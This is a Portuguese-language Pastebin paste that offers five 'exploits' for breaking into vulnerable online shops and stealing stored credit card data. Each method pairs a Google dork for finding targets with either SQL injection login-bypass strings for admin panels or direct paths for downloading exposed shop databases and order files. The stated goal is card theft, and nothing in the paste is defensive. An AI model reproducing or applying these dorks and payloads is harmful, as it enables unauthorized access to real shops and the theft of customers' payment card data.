Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Vou deixar aqui alguns exploits que podem ser usados para ter acesso a um site vulnerável e pegar as CC's.
- Primeira maneira
- google dork --> inurl:"/cart.php?m="
- como a url deve ser --> http://alvo.com/store/cart.php?m=view
- falha --> troque o cart.php?m=view por /admin
- pagina de login do adm --> http://abc.com/store/admin
- username : 'or"="
- Password : 'or"=
- se o site estiver vulnerável vocę irá logar como admin na shop.
- Segunda maneira
- google dork --> inurl:"Lobby.asp"
- como a url deve ser --> http://www.alvo.com/mall/lobby.asp
- falha --> mude a parte /mall/lobby.asp para /fpdb/shop.mdb
- url com a falha --> http://www.alvo.com/fpdb/shop.mdb
- se o site estiver vulnerável o download do db irá iniciar
- Terceira maneira
- google dork :--> inurl:"/shopadmin.asp"
- como a url deve ser --> http://www.alvo.com/shopadmin.asp
- user : 'or'1
- pass : 'or'1
- terá acesso ao db admin se o site estiver vulnerável
- Quarta maneira
- google dork --> allinurl:/metacart/
- url do alvo --> http://www.alvo.com/metacart/about.asp
- alvo --> /database/metacart.mdb
- url com a falha --> http://www.abc.com/metacart/database/metacart.mdb
- download do db se o site estiver vul
- Quinta maneira
- google dork --> allinurl:/DCShop/
- url do alvo --> http://www.alvo.com/xxxx/DCShop/xxxx
- falhas --> /DCShop/orders/orders.txt ou /DCShop/Orders/orders.txt
- url com a falha --> http://www.alvo.com/xxxx/DCShop/orders/orders.txt ou http://www.alvo.com/xxxx/DCShop/Orders/orders.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement